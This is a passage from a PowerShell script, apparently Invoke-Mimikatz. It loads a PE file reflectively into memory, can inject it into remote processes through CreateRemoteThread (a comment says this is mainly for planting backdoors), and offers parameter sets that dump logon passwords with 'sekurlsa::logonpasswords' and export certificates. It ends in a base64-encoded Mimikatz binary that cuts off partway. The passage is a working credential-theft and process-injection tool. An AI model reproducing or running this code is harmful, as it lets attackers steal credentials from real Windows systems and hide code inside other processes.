Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$PEHandle\n\t\t)\n\t\t\n\t\t#Get Win32 constants and functions\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t#Call FreeLibrary for all the imports of the DLL\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t{\n\t\t\t[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\twhile ($true)\n\t\t\t{\n\t\t\t\t$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t#If the structure is null, it signals that this is the end of the array\n\t\t\t\tif ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t{\n\t\t\t\t\tWrite-Verbose \"Done unloading the libraries needed by the PE\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))\n\t\t\t\t$ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)\n\n\t\t\t\tif ($ImportDllHandle -eq $null)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n\t\t\t\tif ($Success -eq $false)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Call DllMain with process detach\n\t\tWrite-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\n\t\t$DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\t\t\n\t\t\n\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t}\n\t}\n\n\n\tFunction Main\n\t{\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants =  Get-Win32Constants\n\t\t\n\t\t$RemoteProcHandle = [IntPtr]::Zero\n\t\n\t\t#If a remote process to inject in to is specified, get a handle to it\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n\t\t{\n\t\t\tThrow \"Can't supply a ProcId and ProcName, choose one or the other\"\n\t\t}\n\t\telseif ($ProcName -ne $null -and $ProcName -ne \"\")\n\t\t{\n\t\t\t$Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n\t\t\tif ($Processes.Count -eq 0)\n\t\t\t{\n\t\t\t\tThrow \"Can't find process $ProcName\"\n\t\t\t}\n\t\t\telseif ($Processes.Count -gt 1)\n\t\t\t{\n\t\t\t\t$ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n\t\t\t\tWrite-Output $ProcInfo\n\t\t\t\tThrow \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$ProcId = $Processes[0].ID\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.\n\t\t#If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n#\t\tif ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n#\t\t{\n#\t\t\tWrite-Verbose \"Getting SeDebugPrivilege\"\n#\t\t\tEnable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n#\t\t}\t\n\t\t\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0))\n\t\t{\n\t\t\t$RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n\t\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't obtain the handle for process ID: $ProcId\"\n\t\t\t}\n\t\t\t\n\t\t\tWrite-Verbose \"Got the handle for the remote process to inject in to\"\n\t\t}\n\t\t\n\n\t\t#Load the PE reflectively\n\t\tWrite-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n\n        try\n        {\n            $Processors = Get-WmiObject -Class Win32_Processor\n        }\n        catch\n        {\n            throw ($_.Exception)\n        }\n\n        if ($Processors -is [array])\n        {\n            $Processor = $Processors[0]\n        } else {\n            $Processor = $Processors\n        }\n\n        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) )\n        {\n            Write-Verbose ( \"Architecture: \" + $Processor.AddressWidth + \" Process: \" + ([System.IntPtr]::Size * 8))\n            Write-Error \"PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS.\" -ErrorAction Stop\n        }\n\n        #Determine whether or not to use 32bit or 64bit bytes\n        if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)\n        }\n        else\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)\n        }\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n\t\t$PEHandle = [IntPtr]::Zero\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\tif ($PELoadedInfo -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to load PE, handle returned is NULL\"\n\t\t}\n\t\t\n\t\t$PEHandle = $PELoadedInfo[0]\n\t\t$RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\t\t\n\t\t\n\t\t#Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\tif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n\t\t{\n\t\t\t#########################################\n\t\t\t### YOUR CODE GOES HERE\n\t\t\t#########################################\n                    Write-Verbose \"Calling function with WString return type\"\n\t\t\t\t    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"powershell_reflective_mimikatz\"\n\t\t\t\t    if ($WStringFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Couldn't find function address.\"\n\t\t\t\t    }\n\t\t\t\t    $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n\t\t\t\t    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)\n                    $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)\n\t\t\t\t    [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput)\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)\n\t\t\t\t    if ($OutputPtr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t    \tThrow \"Unable to get output, Output Ptr is NULL\"\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t        $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\n\t\t\t\t        Write-Output $Output\n\t\t\t\t        $Win32Functions.LocalFree.Invoke($OutputPtr);\n\t\t\t\t    }\n\t\t\t#########################################\n\t\t\t### END OF YOUR CODE\n\t\t\t#########################################\n\t\t}\n\t\t#For remote DLL injection, call a void function which takes no parameters\n\t\telseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\tif (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n\t\t\t{\n\t\t\t\tThrow \"VoidFunc couldn't be found in the DLL\"\n\t\t\t}\n\t\t\t\n\t\t\t$VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n\t\t\t$VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\t\t\t\n\t\t\t#Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n\t\t}\n\t\t\n\t\t#Don't free a library if it is injected in a remote process\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tInvoke-MemoryFreeLibrary -PEHandle $PEHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\t#Just delete the memory allocated in PowerShell to build the PE before injecting to remote process\n\t\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t\t}\n\t\t}\n\t\t\n\t\tWrite-Verbose \"Done!\"\n\t}\n\n\tMain\n}\n\n#Main function to either run the script locally or remotely\nFunction Main\n{\n\tif (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n\t{\n\t\t$DebugPreference  = \"Continue\"\n\t}\n\t\n\tWrite-Verbose \"PowerShell ProcessID: $PID\"\n\t\n\n\tif ($PsCmdlet.ParameterSetName -ieq \"DumpCreds\")\n\t{\n\t\t$ExeArgs = \"sekurlsa::logonpasswords exit\"\n\t}\n    elseif ($PsCmdlet.ParameterSetName -ieq \"DumpCerts\")\n    {\n        $ExeArgs = \"crypto::cng crypto::capi `\"crypto::certificates /export`\" `\"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`\" exit\"\n    }\n    else\n    {\n        $ExeArgs = $Command\n    }\n\n    [System.IO.Directory]::SetCurrentDirectory($pwd)\n\n    # 2.1 (x64) 20161029 OJ Edition!\n    # SHA256 hash: C36572664731F058A282FA6F943E48FE80646F6613C3A46F3EEE1F4A121B2158\n    # VirusTotal Analysis: https://www.virustotal.com/en/file/c36572664731f058a282fa6f943e48fe80646f6613c3a46f3eee1f4a121b2158/analysis/1478821040/\n    $PEBytes64 = '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